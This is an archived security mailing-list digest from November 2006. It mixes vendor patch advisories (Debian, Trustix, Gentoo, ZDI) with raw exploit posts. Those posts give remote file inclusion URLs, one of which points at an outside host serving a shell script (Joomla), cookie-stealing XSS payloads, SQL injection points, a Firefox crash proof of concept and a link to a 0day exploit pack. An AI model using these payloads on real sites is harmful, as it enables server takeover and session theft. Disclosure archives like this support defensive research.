[SECURITY] [DSA 1206-1] New php4 packages fix several vulnerabilities

2006-11-06 Thread Moritz Muehlenhoff
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

- --
Debian Security Advisory DSA 1206-1[EMAIL PROTECTED]
http://www.debian.org/security/ Moritz Muehlenhoff
November 6th, 2006  http://www.debian.org/security/faq
- --

Package: php4
Vulnerability  : several
Problem-Type   : remote
Debian-specific: no
CVE ID : CVE-2005-3353 CVE-2006-3017 CVE-2006-4482 CVE-2006-5465

Several remote vulnerabilities have been discovered in PHP, a
server-side, HTML-embedded scripting language, which may lead to the
execution of arbitrary code. The Common Vulnerabilities and Exposures
project identifies the following problems:

CVE-2005-3353

Tim Starling discovered that missing input sanitising in the EXIF
module could lead to denial of service.

CVE-2006-3017

Stefan Esser discovered a security-critical programming error in the
hashtable implementation of the internal Zend engine.

CVE-2006-4482

It was discovered that str_repeat() and wordwrap() functions perform
insufficient checks for buffer boundaries on 64 bit systems, which
might lead to the execution of arbitrary code.

CVE-2006-5465

Stefan Esser discovered a buffer overflow in the htmlspecialchars()
and htmlentities(), which might lead to the execution of arbitrary
code.

For the stable distribution (sarge) these problems have been fixed in
version 4:4.3.10-18. Builds for hppa and m68k will be provided later
once they are available.

For the unstable distribution (sid) these problems have been fixed in
version 4:4.4.4-4 of php4 and version 5.1.6-6 of php5.

We recommend that you upgrade your php4 packages.


Upgrade Instructions
- 

wget url
will fetch the file for you
dpkg -i file.deb
will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
will update the internal database
apt-get upgrade
will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.


Debian GNU/Linux 3.1 alias sarge
- 

  Source archives:

http://security.debian.org/pool/updates/main/p/php4/php4_4.3.10-18.dsc
  Size/MD5 checksum: 1686 b99c2dd2804c2bbc49e2ddf4552cc80c
http://security.debian.org/pool/updates/main/p/php4/php4_4.3.10-18.diff.gz
  Size/MD5 checksum:   280816 86bdd61412df9ca0b87a5f5aa536a610
http://security.debian.org/pool/updates/main/p/php4/php4_4.3.10.orig.tar.gz
  Size/MD5 checksum:  4892209 73f5d1f42e34efa534a09c6091b5a21e

  Architecture independent components:


http://security.debian.org/pool/updates/main/p/php4/php4-pear_4.3.10-18_all.deb
  Size/MD5 checksum:   25 8d364cb47cfbb8bb2472ca47812123e3
http://security.debian.org/pool/updates/main/p/php4/php4_4.3.10-18_all.deb
  Size/MD5 checksum: 1144 26260bbbf8804b071cdf75ce70bde876

  Alpha architecture:


http://security.debian.org/pool/updates/main/p/php4/libapache-mod-php4_4.3.10-18_alpha.deb
  Size/MD5 checksum:  1700934 1deff9409b11b01a88a805ca8726d3c3

http://security.debian.org/pool/updates/main/p/php4/libapache2-mod-php4_4.3.10-18_alpha.deb
  Size/MD5 checksum:  1698672 d91afe4bf274a9abc1227747765be8ca

http://security.debian.org/pool/updates/main/p/php4/php4-cgi_4.3.10-18_alpha.deb
  Size/MD5 checksum:  3464908 2d3ac8b65a2650bbc60327043bb74cfa

http://security.debian.org/pool/updates/main/p/php4/php4-cli_4.3.10-18_alpha.deb
  Size/MD5 checksum:  1743098 0228c6cb6f305f473d0df08c61bfe10f

http://security.debian.org/pool/updates/main/p/php4/php4-common_4.3.10-18_alpha.deb
  Size/MD5 checksum:   167916 02f6e85f6e12684c41f16cf908aa2a0e

http://security.debian.org/pool/updates/main/p/php4/php4-curl_4.3.10-18_alpha.deb
  Size/MD5 checksum:18148 3aa1ca7f556608a37d8dc6442cbc244e

http://security.debian.org/pool/updates/main/p/php4/php4-dev_4.3.10-18_alpha.deb
  Size/MD5 checksum:   325200 7126e4aa1ca42fd6e04a72ba782dc2e0

http://security.debian.org/pool/updates/main/p/php4/php4-domxml_4.3.10-18_alpha.deb
  Size/MD5 checksum:39036 28fc28ae9bf2b4ab091b7ae6687b027d

http://security.debian.org/pool/updates/main/p/php4/php4-gd_4.3.10-18_alpha.deb
  Size/MD5 checksum:34552 daa6539117567a4fffd1c8196426b3d7

http://security.debian.org/pool/updates/main/p/php4/php4-imap_4.3.10-18_alpha.deb
  Size/MD5 checksum:38060 026c1fdd47d1cc9ff426427d5e04e5c6

http://security.debian.org/pool/updates/main/p/php4/php4-ldap_4.3.10-18_alpha.deb
  Size/MD5 checksum:21378 01d0e1b4abc53a4aff236bae15a3021c

http://security.debian.org/pool/updates/main/p/php4/php4-mcal_4.3.10-18_alpha.deb
  Size/MD5 che

ZDI-06-037: America Online ICQ ActiveX Control Code Execution Vulnerability

2006-11-06 Thread zdi-disclosures
ZDI-06-037: America Online ICQ ActiveX Control Code Execution
Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-06-037.html
November  6, 2006

-- CVE ID:
CVE-2006-5650

-- Affected Vendor:
America Online

-- Affected Products:
America Online ICQ 5.1

-- TippingPoint(TM) IPS Customer Protection:
TippingPoint IPS customers have been protected against this
vulnerability since October 31, 2006 by Digital Vaccine protection
filter ID 4725. For further product information on the TippingPoint IPS:

http://www.tippingpoint.com 

-- Vulnerability Details:
This vulnerability allows attackers to execute arbitrary code on
vulnerable installations of AOL ICQ. User interaction is not required
to exploit this vulnerability.

The specific flaw exists in the DownloadAgent function of the
ICQPhone.SipxPhoneManager ActiveX control with the following CLSID:

54BDE6EC-F42F-4500-AC46-905177444300

The vulnerable function takes a single URI argument of a file to
download and execute under the context of the running user. A malicious
ICQ avatar can be used as an exploitation vector, allowing attackers to
exploit this vulnerability by simply messaging a target ICQ user.

-- Vendor Response:
AOL has issued an update to correct this vulnerability on 10/31/2006.
The update is automatically applied once connected to the ICQ service.

-- Disclosure Timeline:
2006.09.20 - Vulnerability reported to vendor
2006.10.31 - Digital Vaccine released to TippingPoint customers
2006.11.06 - Coordinated public release of advisory

-- Credit:
This vulnerability was discovered by Peter Vreugdenhil.

-- About the Zero Day Initiative (ZDI):
Established by TippingPoint, a division of 3Com, The Zero Day Initiative
(ZDI) represents a best-of-breed model for rewarding security
researchers for responsibly disclosing discovered vulnerabilities.

Researchers interested in getting paid for their security research
through the ZDI can find more information and sign-up at:

http://www.zerodayinitiative.com

The ZDI is unique in how the acquired vulnerability information is used.
3Com does not re-sell the vulnerability details or any exploit code.
Instead, upon notifying the affected product vendor, 3Com provides its
customers with zero day protection through its intrusion prevention
technology. Explicit details regarding the specifics of the
vulnerability are not exposed to any parties until an official vendor
patch is publicly available. Furthermore, with the altruistic aim of
helping to secure a broader user base, 3Com provides this vulnerability
information confidentially to security vendors (including competitors)
who have a vulnerability protection or mitigation product.


VulnDisco Pack for Metasploit

2006-11-06 Thread Evgeny Legerov
Hi,

I am glad to announce that free version of VulnDisco Pack for Metasploit 2.7 is
available for download.

This release includes the following 0day exploits:

vd_ldapinfo.pm - [0day] Query info from LDAP server
vd_xlink.pm - [0day] Omni-NFS Enterprise remote exploit
vd_openldap.pm - [0day] OpenLDAP DoS

You can download it here: http://gleg.net/downloads/VULNDISCO_META_FREE.tar.gz

For more info about VulnDisco Pack for Metasploit please visit:
http://gleg.net/vulndisco_meta.shtml

--
Best regards,
Evgeny Legerov



Advanced Guestbook 2.3.1 (Admin.php) Remote File Include

2006-11-06 Thread broken-proxy
#%#%##%#%##%#%##%#%##%#%##%#%##%#%##%#%##%#%##%#%#

Advanced Guestbook 2.3.1 (Admin.php) Remote File Include


#%#%##%#%##%#%##%#%##%#%##%#%##%#%##%#%##%#%##%#%#

Author: BrokeN-ProXy
Script  : admin.php
Found : www.hotscripts.com
Risk: Dangerous
Dork   : "powered by: Advanced Guestbook 2.3.1"

#%#%##%#%##%#%##%#%##%#%##%#%##%#%##%#%##%#%##%#%#

Exploit:

www.Site.com/[AGuest Path]/admin.php?include_path=Shell?cmd

Notice:

[AGuest Path] may be more than One, You are adviced to use the direct result os 
search.

#%#%##%#%##%#%##%#%##%#%##%#%##%#%##%#%##%#%##%#%#

GreestZ: 
nEt^DeViL[ My Best friend ] .:.  RoDhEDoR .:. Linux_Drox .:. A-S-T [ Dr-Hacker 
] .:. SnIpEr_SA .:. Eddy_BAck0o .:.  Red Devils Crew[ â|Màëstrô ]  .:. 
PROHacker  .:. Devil-00 .:. Red_Casper  .:.  ReMoTeR  .:. Le CoPrA .:. Mor0ccan 
Islam Defenders Team .:. Mr.Elgaarh  .:. Team-Evil [ X-BLooD-X ]  .:. MosT3mR 
.:. CracK_Man .:. b0rizQ .:. ThXGhost .:. 0sama_11_9 .:. nEt^vIrUS .:. -=MIZO=-
And All Users in:
www.3asfh.net/vb/
www.lezr.com/vb/

broken-proxy[at]Linuxmail[dot]org


XSS Vulnerability in Zend Framework Preview 0.2.0

2006-11-06 Thread security
Armorize Technologies Security Advisory

Advisory No:
Armorize-ADV-2006-0009

Status:
Partial

Date:
2006/11/03

Summary:
Armorize-ADV-2006-0009 discloses cross-site scripting vulnerability that is 
found in the sample codes of Zend Framework (http://framework.zend.com/), which 
aims to provide a complete system for developing web applications powered by 
PHP 5. It is an architecture for developing entire applications with no other 
library dependencies. This code will always be actively developed, tested, and 
supported by Zend and the PHP Collaboration Project.

Affected Software:
ZendFramework Preview 0.2.0

Vulnerability Description:
Cross Site Scripting

Analysis/Impact:
Privacy leakages from the client-side may lead to session hijacking, identity 
theft and information theft.

Detection/Exploit(partial):
ZendFramework-0.2.0/incubator/tests/Zend/Http/_files/testRedirections.php/?redirection=3&[ANY]=[XSS]

Protection/Solution:
1. Escape every questionable URI and HTML script.
2. Remove prohibited user input.

Credit: Security Team at Armorize Technologies, Inc. ([EMAIL PROTECTED])

Additional Information:
Link to this Armorize advisory
http://www.armorize.com/advisory.php?Keyword=Armorize-ADV-2006-0009

Links to all Armorize advisories
http://www.armorize.com/advisory/

Links to Armorize vulnerability database
http://www.armorize.com/resources/vulnerability.php

Armorize Technologies is delivering the world's most advanced source code 
analysis solution for Web application security based on its award-winning and 
patent-pending verification technologies. Addressing security early in the 
software development life cycle (SDLC), Armorize CodeSecure proactively 
identifies and traces vulnerabilities in Web application source code, 
effectively hardening websites against today's ever growing security threats. 
CodeSecure's zero-false-positive accuracy, traceback support and Web 2.0-based 
interface make it the premium Web application security solution. For more 
information please visit: http://www.armorize.com.


[SECURITY] [DSA 1204-1] New ingo1 packages fix arbitrary shell command execution

2006-11-06 Thread Moritz Muehlenhoff
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

- --
Debian Security Advisory DSA 1204-1[EMAIL PROTECTED]
http://www.debian.org/security/ Moritz Muehlenhoff
November 2nd, 2006  http://www.debian.org/security/faq
- --

Package: ingo1
Vulnerability  : missing input sanitising
Problem-Type   : remote
Debian-specific: no
CVE ID : CVE-2006-5449
Debian Bug : 396099

It was discovered that the Ingo email filter rules manager performs 
insufficient escaping of user-provided data in created procmail rules
files, which allows the execution of arbitrary shell commands.

For the stable distribution (sarge), this problem has been fixed in
version 1.0.1-1sarge1.

For the unstable distribution (sid), this problem has been fixed in
version 1.1.2-1.

We recommend that you upgrade your ingo1 package.

Upgrade Instructions
- 

wget url
will fetch the file for you
dpkg -i file.deb
will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
will update the internal database
apt-get upgrade
will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.


Debian GNU/Linux 3.1 alias sarge
- 

  Source archives:

http://security.debian.org/pool/updates/main/i/ingo1/ingo1_1.0.1-1sarge1.dsc
  Size/MD5 checksum:  683 b8be1fc591da938deb08cb78a9d42f0d

http://security.debian.org/pool/updates/main/i/ingo1/ingo1_1.0.1-1sarge1.diff.gz
  Size/MD5 checksum: 5161 358e14a64fe43a56cc1b9742f271c3ec
http://security.debian.org/pool/updates/main/i/ingo1/ingo1_1.0.1.orig.tar.gz
  Size/MD5 checksum:   733108 509bf92a2ee44597d6ffd9a0a9b4a039

  Architecture independent components:


http://security.debian.org/pool/updates/main/i/ingo1/ingo1_1.0.1-1sarge1_all.deb
  Size/MD5 checksum:   760018 83f7044a2861f8e6aaea0c684fb2f6e0


  These files will probably be moved into the stable distribution on
  its next update.

- 
-
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security 
dists/stable/updates/main
Mailing list: debian-security-announce@lists.debian.org
Package info: `apt-cache show ' and http://packages.debian.org/
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.5 (GNU/Linux)

iD8DBQFFSoLZXm3vHE4uyloRAmikAJ9wxVnvsfGUoJ2RMKPYHKhHj3ohPACfQkBf
N/hCLdcpjKz+Q/Jz/VxGsZ0=
=a886
-END PGP SIGNATURE-









TSLSA-2006-0061 - multi

2006-11-06 Thread Trustix Security Advisor
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

- --
Trustix Secure Linux Security Advisory #2006-0061

Package names: mutt, pam_ldap, php 
Summary:   Multiple vulnerabilities
Date:  2006-11-03
Affected versions: Trustix Secure Linux 2.2
   Trustix Secure Linux 3.0
   Trustix Operating System - Enterprise Server 2

- --
Package description:
  mutt
  Mutt is a text mode mail user agent. Mutt supports color, threading,
  arbitrary key remapping, and a lot of customization.

  pam_ldap
  Pam_ldap is a module for Linux-PAM that supports password changes,
  V2/V3 clients, Netscapes SSL/OpenSSL, ypldapd, Netscape Directory
  Server password policies, access authorization, crypted hashes, etc.

  php
  PHP is an HTML-embedded scripting language. PHP attempts to
  make it easy for developers to write dynamically generated web
  pages. PHP also offers built-in database integration for several
  commercial and non-commercial database management systems, so
  writing a database-enabled web page with PHP is fairly simple.
  The most common use of PHP coding is probably as a replacement
  for CGI scripts. The mod_php module enables the Apache web server
  to understand and process the embedded PHP language in web pages.

Problem description:
  mutt < TSL 3.0 > < TSL 2.2 > < TSEL 2 >
  - SECURITY Fix: A race condition in the safe_open function, when
creating temporary files in an NFS filesystem, allows local users
to overwrite arbitrary files due to limitations of the use of the
O_EXCL flag on NFS filesystems.
  - The mutt_adv_mktemp function does not properly verify that temporary
files that have been created with restricted permissions, which might
allow local users to create files with weak permissions via a race
condition between the mktemp and safe_fopen function calls.

The Common Vulnerabilities and Exposures project (cve.mitre.org) has
assigned the names CVE-2006-5297 and CVE-2006-5298 to these issue.

  pam_ldap < TSL 3.0 > < TSL 2.2 > 
  - New upstream.
  - SECURITY Fix: Steve Rigler has reported a security issue which
can be exploited by malicious people to bypass certain security
restrictions. The issue is caused due to an error within the
handling of "PasswordPolicyResponse" control messages when
authenticating against an LDAP server. This causes the
"pam_authenticate()" function to always succeed, even if the
previous authentication failed.
  
The common Vulnerabilities and Exposures project (cve.mitre.org)
has assigned the names CVE-2006-5170 to this issue.
 
  php < TSL 3.0 > < TSL 2.2 >
  - New Upstream.
  - SECURITY Fix: Some vulnerabilities have been reported in PHP,
caused due to boundary errors within the "htmlentities()" and
"htmlspecialchars()" functions. If a PHP application uses these
functions to process user-supplied input, this can be exploited
to cause buffer overflows by passing specially crafted data to
the affected application.

The Common Vulnerabilities and Exposures project has assigned the
name CVE-2006-5465 to this issue.
  - Added support for mcrypt, Bug #1956.
  - Added support for pdo-sqlite, pdo-mysql and sqlite, Bug #1959.
  - Included openssl support, Bug #1958.
  - Added buildrequires expat-devel and fontconfig-devel, Bug #2011.  

Action:
  We recommend that all systems with this package installed be upgraded.
  Please note that if you do not need the functionality provided by this
  package, you may want to remove it from your system.


Location:
  All Trustix Secure Linux updates are available from
  http://http.trustix.org/pub/trustix/updates/>
  ftp://ftp.trustix.org/pub/trustix/updates/>


About Trustix Secure Linux:
  Trustix Secure Linux is a small Linux distribution for servers. With focus
  on security and stability, the system is painlessly kept safe and up to
  date from day one using swup, the automated software updater.


Automatic updates:
  Users of the SWUP tool can enjoy having updates automatically
  installed using 'swup --upgrade'.


Questions?
  Check out our mailing lists:
  http://www.trustix.org/support/>


Verification:
  This advisory along with all Trustix packages are signed with the
  TSL sign key.
  This key is available from:
  http://www.trustix.org/TSL-SIGN-KEY>

  The advisory itself is available from the errata pages at
  http://www.trustix.org/errata/trustix-2.2/> and
  http://www.trustix.org/errata/trustix-3.0/>
  or directly at
  http://www.trustix.org/errata/2006/0061/>


MD5sums of the packages:
- --
d96dae8b76785537380e77396b81c3c6  3.0/rpms/ldapclients-common-183-1tr.i586.rpm
7e4101d0079ef3d20aec6cd9a0ee47fc  3.0/rpms/mutt-1.4.2.1-10tr.i586.rpm
a1a0ef53c02871c63a0f889d52e56464  

Ariadne <= 2.4.1 Multiple Remote File Include Vulnerabilities(New)

2006-11-06 Thread ajannhwt
***
# Title  :  Ariadne  <= 2.4.1 Multiple Remote File Include Vulnerabilities

# Author :   ajann

# Script Page :   http://www.ariadne-cms.org/en/download/

# Vuln;

***
[Files]
loader.php
loader.cmd.php
[/Files]

[Code,1]
loader.php Error:

..

require($ariadne."/configs/ariadne.phtml");
require($ariadne."/configs/ftp/$configfile");
require($ariadne."/configs/store.phtml");
require($ariadne."/includes/loader.ftp.php");
require($ariadne."/configs/sessions.phtml");
require($ariadne."/stores/".$store_config["dbms"]."store.phtml");
require($ariadne."/nls/en");
require($ariadne."/modules/mod_mimemagic.php");

require($ariadne."/modules/mod_virusscan.php");

..

Key [:] ariadne=[file]
Key [:] store_config[code]=[file]

\Example:

http://target.com/path/ftp/loader.php?ariadne=Shell
http://target.com/path/lib/includes/loader.cmd.php?store_config[code]=Shell


# ajann,Turkey
# ...
# Im not Hacker!


RE: Internet Explorer 7 - Still Spyware Writers' Heaven

2006-11-06 Thread Roger A. Grimes
So all the malware writer has to do now is figure out how to do the
initial exploit in the first place, that would then allow them to muck
with path statements or place code in path executable areas. I mean, do
you get it, yet? If the malware writer figures out how do the initial
exploit, anything can be done, not just the path tricks.  

My WhereWindowsMalwareHides
document(http://weblog.infoworld.com/securityadviser/archives/2006/05/up
dated_where_w.html)contains over 145 different tricks and locations
where malware can hide and live, along with the path trick. Your point
is a valid point, but it's been a known issue for years. 

You can't skip over the hardest part, the initial exploit, and start
picking on one of over a hundred ways to muck with Windows users and
call "IE 7 a Spyware Writer's Heaven". I mean you can, but it looks like
you're grasping at straws. At least tell us something new, and not
something that's been documented for years.

Roger

-Original Message-
From: Eliah Kagan [mailto:[EMAIL PROTECTED] 
Sent: Friday, November 03, 2006 9:26 PM
To: full-disclosure@lists.grok.org.uk; bugtraq@securityfocus.com
Subject: Re: Internet Explorer 7 - Still Spyware Writers' Heaven

On 11/2/06, Roger A. Grimes wrote:
> So, if you're statement is accurate that malware would need to be 
> placed in a directory identified by the PATH statement, we can relax 
> because that would require Administrator access to pull off. Admin 
> access would be needed to modify the PATH statement appropriately to 
> include the user's desktop or some other new user writable location or

> Admin access would be needed to copy a file into the locations 
> indicated by the default PATH statement.

It would not require *administrator* access--non-administrator users can
still add things to their own PATHs, just not to the universal, system
PATH. (See Control Panel > System > Advanced > Environment
Variables.)

-Eliah


Re: Internet Explorer 7 - Still Spyware Writers' Heaven

2006-11-06 Thread Eliah Kagan

On 11/4/06, Joshua Gimer wrote:

If Microsoft is not planning on providing a fix for this until Vista, I can
see a worm coming from this.


It's highly unlikely that this would be useful to the spreading of a
worm. Worms infect computers over a network, relying either on
remotely exploitable vulnerabilities that require no user interaction,
or on vulnerabilities that require user interaction where it is easy
to produce the necessary user action. Getting a malicious file into a
user's path (or the system path) is nontrivial, and generally requires
that something else be going on.


Forgive me if I don't know how this works in
the windows world, but when it is looking for this DLL, does it take the
first one that it finds within your path; like in UNIX? Or does it look in
all directories within your path and then decide? I am guessing the former,
but I am just clarifying.


It is the former--for libraries (DLLs) or executables (.exe, .com,
.bat, .cmd, and so forth) the one that gets linked to or executed when
the path is searched is the one that is in the earliest directory in
the path (or the one that is in the working directory--unlike in *nix
systems, in Windows the current directory--typically the directory
that the calling program is located in--is searched first, before the
path is consulted; you may see similar behavior in some *nix systems,
but in such cases you will find that in actuality the directory "." is
in the path).

-Eliah


MajorSecurity Advisory #32]phpComasy CMS - Multiple Cross Site Scripting Issues

2006-11-06 Thread admin
MajorSecurity Advisory #32]phpComasy CMS - Multiple Cross Site Scripting Issues

Details
===
Product: phpComasy CMS
Affected Version: <= 0.7.9 pre
Security-Risk: moderated
Remote-Exploit: yes
Vendor-URL: http://www.phpcomasy.org
Vendor-Status: informed
Advisory-Status: published

Credits

Discovered by: David Vieira-Kurz
http://www.majorsecurity.de

Original Advisory:

http://www.majorsecurity.de/index_2.php?major_rls=major_rls32

Introduction

phpComasy CMS is a Content Management System.

More Details

Cross Site Scripting:
Input passed directly to the "username" and "password" parameter in "index.php" 
is not properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user's 
browser session in context of an affected site.

Fix
===
Version 0.8

Solution
=
Edit the source code to ensure that input is properly sanitised.
You should work with "htmlspecialchars()" or "htmlentities()" php-function to 
ensure that html tags
are not going to be executed. Further it is recommend to set off the "register 
globals" option in the
"php.ini" on your webserver.

Example:
$pass = htmlentities($_POST['pass']);
$test = htmlspecialchars($_GET('test'));
?>

History/Timeline

02.11.2006 discovery of the vulnerabilities
02.11.2006 additional tests with other versions
03.11.2006 contacted the vendor
04.11.2006 the vendor contacted me(response)
04.11.2006 vendor confirmed the bugs
05.11.2006 bugs have been fixed
06.11.2006 advisory is written
06.11.2006 advisory released

MajorSecurity
===
MajorSecurity is a German penetration testing and security research project
which consists of only one person at the present time.
I am looking for a sponsor.
You can find more Information on the MajorSecurity Project at
http://www.majorsecurity.de/


[ GLSA 200611-02 ] Qt: Integer overflow

2006-11-06 Thread Matthias Geerdsen

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory   GLSA 200611-02
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
 Title: Qt: Integer overflow
  Date: November 06, 2006
  Bugs: #151838
ID: 200611-02

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis


An integer overflow flaw in the Qt pixmap handling could possibly lead
to a Denial of Service or the remote execution of arbitrary code.

Background
==

Qt is a cross-platform GUI toolkit, which is used e.g. by KDE.

Affected packages
=

---
 Package  /  Vulnerable  /  Unaffected
---
  1  x11-libs/qt < 4.1.4-r2>= 4.1.4-r2
  *>= 3.3.6-r4

Description
===

An integer overflow flaw has been found in the pixmap handling of Qt.

Impact
==

By enticing a user to open a specially crafted pixmap image in an
application using Qt, e.g. Konqueror, a remote attacker could be able
to cause an application crash or the execution of arbitrary code with
the rights of the user running the application.

Workaround
==

There is no known workaround at this time.

Resolution
==

All Qt 3.x users should upgrade to the latest version:

# emerge --sync
# emerge --ask --oneshot --verbose ">=x11-libs/qt-3.3.6-r4"

All Qt 4.x users should upgrade to the latest version:

# emerge --sync
# emerge --ask --oneshot --verbose ">=x11-libs/qt-4.1.4-r2"

References
==

  [ 1 ] CVE-2006-4811
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4811

Availability


This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200611-02.xml

Concerns?
=

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users machines is of utmost
importance to us. Any security concerns should be addressed to
[EMAIL PROTECTED] or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
===

Copyright 2006 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5



signature.asc
Description: OpenPGP digital signature


Cross Site Scripting (XSS) Vulnerability in IBM WebSphere Application Server

2006-11-06 Thread ProCheckUp Research
Title: Cross Site Scripting (XSS) Vulnerability in IBM WebSphere 
Application Server


ProCheckUp Security Bulletin

Description: IBM WebSphere Application Server is vulnerable to Cross 
Site Scripting through a 'faultfactor' tag in the 500 Internal Server 
Error page on port 8880 (default SOAP port).


Date found: 2005-02-27

Vulnerable: This has been tested on WebSphere Application Server version 
6.x.  Other versions may be vulnerable but this has not been verified.


Severity: Medium

Author: Nuri Fattah [EMAIL PROTECTED]

Vendor Status:

CVE Candidate: Not Assigned

Description:

WebSphere Application Server is vulnerable to a Cross Site Scripting 
attack through the Internal Server Error page used on port 8880 of the 
default WebSphere installation.  This may allow the execution of 
malicious script code in the browser of an individual who clicks on a 
link to a site using the vulnerable version of WebSphere.


Information:

REQUEST:

GET /alert('Can%20Cross%20Site%20Attack') HTTP/1.1
Host: 192.168.1.195:8880
Connection: close


RESULTS:

HTTP/1.1 500 Internal Server Error
Server: WebSphere Application Server/6.0
Content-Type: text/xml; charset=utf-8
Content-Length: 3013
Connection: close


xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/"; 
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"; 
xmlns:xsd="http://www.w3.org/2001/XMLSchema";>
ns0:JMXMessageVersion="1.0.0" ns0:JMXVersion="1.2.0">





[output omitted]

/alert('Can%20Cross%20Site%20Attack')





Consequences:

An attacker could cause the execution of malicious script code in the 
client of an individual who clicks on a link to a site using the 
vulnerable version of WebSphere Application Server.  

Fix: IBM has released patches to address this issue. They have tracked 
this vulnerability as APAR PK16602.


References: http://www.niscc.gov.uk/niscc/docs/re-20061031-00727.pdf?lang=en
  
Legal:


Copyright 2005 ProCheckUp Ltd.  All rights reserved.
   
Permission is granted for copying and circulating this Bulletin to the 
Internet community for the purpose of alerting them to problems, if and 
only if the Bulletin is not changed or edited in any way, is attributed 
to ProCheckUp, and provided such reproduction and/or distribution is 
performed for non-commercial purposes.
   
Any other use of this information is prohibited.  ProCheckUp is not 
liable for any misuse of this information by any third party


MWChat pro V 7.0 <= (CONFIG[MWCHAT_Libs]) Remote File Include Vulnerability

2006-11-06 Thread -= SHELL =- -= SHELL =-



MWChat pro V 7.0

Class = Remote File Inclusion

URL : http://www.appindex.net/products/download/?product=mwchat&version=7.0

Found by = Mr.3FReeT ..



code in :.
about.php , buddy.php , chat.php , dialog.php , head.php , help.php , 
index.php , license.php . nearly all :D


require_once("$CONFIG[MWCHAT_Libs]/security.php");



Exploit:


http://[target]/[path]/about.php?CONFIG[MWCHAT_Libs]=shellcode.txt?
http://[target]/[path]/buddy.php?CONFIG[MWCHAT_Libs]=shellcode.txt?
http://[target]/[path]/chat.php?CONFIG[MWCHAT_Libs]=shellcode.txt?
http://[target]/[path]/dialog.php?CONFIG[MWCHAT_Libs]=shellcode.txt?
http://[target]/[path]/head.php?CONFIG[MWCHAT_Libs]=shellcode.txt?
http://[target]/[path]/help.php?CONFIG[MWCHAT_Libs]=shellcode.txt?
http://[target]/[path]/index.php?CONFIG[MWCHAT_Libs]=shellcode.txt?
http://[target]/[path]/license.php?CONFIG[MWCHAT_Libs]=shellcode.txt?



Greetz : KuW SeC TeaM.. & ToOoFa , General C , Asbmay , Q8^RocK 
...




_
FREE pop-up blocking with the new MSN Toolbar - get it now! 
http://toolbar.msn.click-url.com/go/onm00200415ave/direct/01/




Joomla 1.0.11 Remote File Include

2006-11-06 Thread root
  

Author : Super-Crystal
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==

website: http://www.joomla.org/
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--==-=-==-=

Bug : include_once ( $mosConfig_absolute_path . '/language/'. $mosConfig_lang 
.'.php' );

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--==-=-==-=

Exploit : 
www.target.com/script_path/installation/index.php?mosConfig_absolute_path=http://www.arab4services.com/c-h.v2.txt?
--> 
www.target.com/script_path/administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://www.arab4services.com/c-h.v2.txt?



Script Download   
http://forge.joomla.org/sf/frs/do/downloadFile/projects.joomla/frs.joomla_1_0.1_0_11/frs6654;jsessionid=860E9B227E096AAC4453A3B1FDCE77F5?dl=1


=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Thanx : Arab4Services Team  www.arab4services.com :)


Re: New Flaw in Firefox 2.0: DoS and possible remote code execution

2006-11-06 Thread Jan Heisterkamp

[EMAIL PROTECTED] schrieb:

New Flaw in Firefox 2.0: DoS and possible remote code execution

PoC here: http://werterxyz.altervista.org/Firefox2Range.htm





function do_crash()
{
var range;

range = document.createRange();
range.selectNode(document.firstChild);
range.createContextualFragment('');
}



Good bye Firefox!



  

hi!
that works also under firefox v1.5.0.7.
regards
jan


AIOCP <=1.3.007 multiples vulnerabilities [sql , remote file include , xss]

2006-11-06 Thread saps . audit
AIOCP <=1.3.007 multiples vulnerabilities[injection sql , remote file include , 
xss] 

XSS get =
- 
/public/code/cp_forum_view.php?fmode=top&topid='">alert(document.cookie)
- 
/public/code/cp_forum_view.php?fmode=top&topid=53&forid='">alert(document.cookie)
- 
/public/code/cp_forum_view.php?fmode=top&topid=53&forid=23&catid='">alert(document.cookie)
- 
/public/code/cp_dpage.php?choosed_language='">alert(document.cookie)
- 
/public/code/cp_forum_view.php?fmode=top&topid=53&forid='">alert(document.cookie)
- 
/public/code/cp_forum_view.php?fmode=top&topid=53&forid=3&catid='">alert(document.cookie)
- 
/public/code/cp_show_ec_products.php?order_field='">alert(document.cookie)
- 
/public/code/cp_users_online.php?order_field='">alert(document.cookie)
- 
/public/code/cp_links_search.php?orderdir='">alert(document.cookie)

xss post in user profile :
- signature
- fiscal code

remote file include =
/admin/code/index.php?load_page=http%3A//google.com
( no login needed for the remote file include ) 

sql injection =
- /public/code/cp_dpage.php?choosed_language=[sql]
- /public/code/cp_news.php?choosed_language=[sql]
- /public/code/cp_news.php?news_category=[sql]
- /public/code/cp_forum_view.php?choosed_language=[sql]
- /public/code/cp_edit_user.php?choosed_language=[sql]
